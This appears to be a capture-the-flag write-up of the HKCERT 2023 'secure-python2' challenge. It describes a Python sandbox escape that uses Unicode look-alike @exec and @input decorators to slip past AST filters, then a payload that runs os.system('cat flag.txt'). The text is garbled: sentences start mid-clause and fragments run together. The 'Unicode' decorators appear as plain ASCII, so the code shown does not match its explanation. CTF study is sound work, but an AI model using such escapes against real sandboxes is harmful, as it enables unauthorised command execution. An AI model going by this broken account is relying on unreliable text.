In this challenge, we are tasked with bypassing a Python sandbox that restricts certain function calls, such as exec and __import__, through AST (Abstract Syntax Tree) transformations. The goal is to execute system commands despite these restrictions.
exec, __import__, and input) by analyzing the Python code's AST.@exec, @input) aren't always treated the same way and may bypass the restrictions.@exec and @input as decorators to a class definition, we can indirectly execute the system command without triggering the sandbox's AST filters.exec and input, we can bypass the blacklist because these characters look like the restricted keywords but are different enough to be accepted.Payload:
We use Unicode characters to replace exec and input:
@exec
@input
class X:
pass
When we run this, the sandbox doesn’t block the decorators because they are non-ASCII. Then, we input the payload:
__import__("os").system("cat flag.txt")
Why It Works:
input function, bypassing the usual AST filters and running the system command.# Step 1: Use Unicode decorators to bypass the sandbox
@exec
@input
class X:
pass
# Step 2: Input the payload to execute the system command
>>> __import__("os").system("cat flag.txt")
For more details about this challenge, you can visit the official GitHub page of the challenge:
hkcert-ctf-2023-challenges/45-secure-python2 at master · blackb6a/hkcert-ctf-2023-challenges